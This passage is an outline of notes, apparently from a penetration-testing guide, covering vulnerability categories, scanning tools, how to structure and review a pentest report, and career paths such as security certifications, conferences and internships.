- Cross-Site Request Forgery (an attack that targets a victim’s browser)
- Using Known Vulnerable Components
- Unvalidated Redirects and Forwards
-
Automated Tools
- CORE IMPACT
- HP WebInspect
- Nikto
- Paros Proxy
-
Burp Suite Pro
- A proxy server
- A spider tool
- A vulnerability scanner
- A repeater tool
- A sequencing tool
-
Reporting Results
-
What Should You Report?
-
Out of Scope Issues
- Findings that are discovered during the course of the pentest on a target
- Findings that indicate systemic flaws in the overall architecture
-
Findings
- We need to include what was not found as well
- There will be times when a finding needs to be reported on immediately.
-
Solutions
- Believe it or not, clients like to be told what to do.
-
Manuscript Preparation
-
Title Page
- Introduce the topic of the report
- Introduce author and the penetration test team’s organization
- Great place to brandish logos and make everything look appealing
- Primary goal: Provide a clear message of what the report is about
-
Abstract
- The abstract = The executive report
- The executive summary should be no longer than one page and contain concise analysis and findings
-
Text
- elements
- Description of the target network or system
- Vulnerability findings
- Remediation
- we should include graphical representation of the architecture and include descriptions of each element
- Vulnerability findings and remediation options should be meshed together
-
References
- we should provide the reader Internet references regarding the vulnerabilities
- The National Vulnerability Database, located at http://nvd.nist.gov, is a good choice
-
Appendices
- At least two appendices
- a list of definitions
- The step-by-step events surrounding each vulnerability exploitation
-
Initial Report
-
Peer Reviews
- We all make mistakes, especially when writing.
-
Fact Checking
- e can generate a list of questions that we need to answer or we can send a copy of the initial report to the client so that they can verify all statements within the document
-
Metrics
- Nessus
- CORE IMPACT
-
Final Report
-
Peer Reviews
- it is often prudent to conduct additional peer reviews on the report
- This is our last chance to correct any grammatical errors
-
Documentation
- Most customers are comfortable with receiving printed reports
- Microsoft Word documents, or Adobe’s Portable Document Format (PDF)
- If we already have a digital certificate, we can use it to sign our document
- Selecting file for inclusion into security envelope.
-
Hacking as a career
-
Career Paths
-
Network Architecture
- make sure that you understand as many different facets of network architecture as you can if you want to become a pentest engineer
-
Learn about
- Communication protocols
- VoIP
- routers
- switches
- IDS
- firewall
- wireless
- ransmission Control Protocol (TCP)
- and anything else you can think of
- System Administration
- Applications and Databases
-
Certifications
-
High-Level Certifications
-
(ISC)2
- www.isc2.org
- About (ISC)2
- Headquartered in the United States
- offices in
- London
- Hong Kong
- Tokyo
- compendium
- Associate of (ISC)2
- This designation was created for individuals who do not meet the experience requirements to obtain any of the other certifications with (ISC)2
- employer that the associates have the knowledge to obtain the certifications, even if they don’t have the experience
- SSCP [(ISC)2]
- Access Controls
- Analysis and Monitoring
- Cryptography SSCP
- Malicious Code
- Networks and Telecommunications
- Risk, Response, and Recovery
- Security Operations and Administration
- Certification and Accreditation Professional (CAP)
- Understanding the Purpose of Certification
- Initiation of the System Authorization Process
- Certification Phase
- Accreditation Phase
- Continuous Monitoring Phase
- Certified Secure Software Lifecycle Professional (CSSLP) [(ISC)2]
- Secure Software Concepts
- Secure Software Requirements
- Secure Software Design
- Secure Software Implementation/Coding
- Secure Software Testing
- Software Acceptance
- Software Deployment, Operations, Maintenance, and Disposal
- CISSP [(ISC)2]
- Access Control
- Application Security
- Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP)
- Cryptography
- Information Security and Risk Management
- Legal, Regulations, Compliance, and Investigations
- Operations Security
- Physical (Environmental) Security
- Security Architecture and Design
- Telecommunications and Network Security
- CISSP-ISSAP [(ISC)2]
- Access Control Systems and Methodology
- Cryptography
- Physical Security Integration
- Requirements Analysis and Security Standards, Guidelines and Criteria
- Technology-Related BCP and DRP
- Telecommunications and Network Security
- CISSP-ISSEP [(ISC)2]
- C&A
- Systems Security Engineering
- Technical Management
- U.S. Government Information Assurance Regulations
- CISSP-ISSMP [(ISC)2]
- BCP and DRP and Continuity of Operations Planning
- Enterprise Security Management Practices
- Enterprise-wide System Development Security
- Law, Investigations, Forensics, and Ethics
- Overseeing Compliance of Operations Security
- Information Systems Audit and Control Association
- Certified Information Systems Auditor
- Certified Information Security Manager
-
Global Information Assurance Certification
- GIAC Security Leadership Certification
- GIAC Security Expert
-
CompTIA
- Security +
- Network security
- Compliance and operational security
- Threats and vulnerabilities
- Application, data, and host security
- Access control and identity management
- Cryptography
-
Project Management Institute
- Project Management Professional (PMP)
- Initiation
- Planning
- Executing
- Monitoring and Controlling
- Closing
- Dynamic Systems Development Method Consortium
-
Skill- and Vendor-Specific Certifications
-
Cisco
- Cisco Certified Network Associate Security
- Cisco Certified Network Professional Security
- Cisco Certified Internetwork Expert
-
Global Information Assurance Certification
- GIAC Information Security Fundamentals
- GIAC Security Essentials Certification
- GIAC Web Application Penetration Tester (GWAPT)
- GIAC Certified Enterprise Defender (GCED)
- GIAC Certified Firewall Analyst (GCFW)
- GIAC Certified Intrusion Analyst (GCIA)
- GIAC Certified Incident Handler (GCIH)
- GIAC Certified Windows Security Administrator (GCWN)
- GIAC Certified UNIX Security Administrator (GCUX)
- GIAC Certified Forensics Analyst (GCFA)
- GIAC Certified Penetration Tester (GPEN
-
Check Point
- Check Point Certified Security Administrator
- Check Point Certified Security Expert
- Check Point Certified Managed Security Expert
- Check Point Certified Master Architect (CCMA)
-
Juniper Networks
- JNCIA-Junos (Juniper Networks)
- Juniper systems certifications JNCIS-SEC
- JNCIE-SEC
- Oracle
-
Associations and Organizations
-
Professional Organizations
- merican Society for Industrial Security
- Institute of Electrical and Electronics Engineers
- ISACA—ISACA
- Information Systems Security Association
- The Open Organisation of Lockpickers
-
Conferences
- DoD Cyber Crime Conference
- Network and Distributed System Security
- ShmooCon
- GOVSEC and U.S. Law Conference
- Theory of Cryptography Conference (TCC)
- IEEE Symposium on Security and Privacy
- The International Conference on Dependable Systems and Networks (DSN)
- REcon (Reverse Engineering Convention)
- Black Hat
- Computer Security Foundations Symposium
- Hackers on Planet Earth (HOPE)
- DefCon
- International Cryptology Conference
- USENIX Security Symposium
- European Symposium on Research in Computer Security
- International Symposium on Recent Advances in Intrusion Detection
- ToorCon
- Internet Measurement Conference (IMC)
- Microsoft BlueHat Security Briefings
- Association for Computing Machinery (ACM) Conference on
Computer and Communications Security
- Annual Computer Security Applications Conference
- Chaos Communication Congress
- Local Communities
-
Mailing Lists
- www.Securityfocus.com/archive
- Bugtraq—Bugtraq
- Focus-IDS
- INCIDENTS
- Security Basics
- SecurityJobs
-
Putting It All Together
-
Resume
-
Volunteering
- Charities
- www.HackersForCharity.org
- craigslist.org,
- Open Source Projects
-
Internships
- www.dhs.gov/student-opportunities
- (www.fbi.gov/about-us/otd/internships
- www.cia.gov/careers/student-opportunities/index.html
- www.makingthedifference.org/federalinternships/directory
- Job Listings
-
Salary Surveys
-
Job Position Surveys
- www.Salary.com.
- http://www.cisco.com/web/learning/employer_resources/pdfs/2012_salary_rpt.pdf
- Certification Surveys
- Personal Documents